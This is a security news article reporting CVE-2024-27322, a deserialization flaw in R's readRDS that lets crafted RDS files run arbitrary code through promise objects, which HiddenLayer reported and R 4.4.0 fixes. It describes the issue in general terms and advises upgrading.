High-Severity R Flaw (CVE-2024-27322) Puts Users at Risk

A critical vulnerability has been discovered in the R programming language, potentially exposing organizations using this popular open-source language to software supply chain attacks.

The vulnerability, designated CVE-2024-27322, has been rated 8.8 out of 10 on the CVSS scale. The issue arises from the deserialization process in R, where objects encoded in formats like JSON, XML, and binary are converted back to their original form for use within an application or program.

CVE-2024-27322

readRDS Exploited

R is extensively employed for statistical computations and graph creation, and is particularly favored by developers in sectors such as financial services, healthcare, scientific research, government operations, and in environments dealing with large datasets such as artificial intelligence and machine learning.

Researchers from HiddenLayer have identified a flaw in R’s deserialization process that allows attackers to execute arbitrary code within the victim’s environment using a specially crafted RDS file. Such files are frequently utilized to store objects in R for later use or sharing.

This vulnerability involves R concepts like “lazy evaluation” and “promise objects.” Lazy evaluation is a programming technique where the program does not compute an expression or variable until it is needed. Promise objects are closely linked with lazy evaluation and represent objects whose evaluation is deferred.

Attackers can exploit these concepts by creating an RDS file containing a specially prepared promise object with embedded arbitrary code, which will be executed when the user loads the infected file or package.

The vulnerability could potentially affect thousands of users as a result of a possible widespread attack on the open-source software supply chain for R packages, particularly given that hubs like R-Forge or Bioconductor are regularly used by many developers.

After HiddenLayer reported the issue to the developers of R, it was addressed in version R 4.4.0. Experts recommend that all organizations using R in software development upgrade to the latest version of the language to mitigate any potential risks.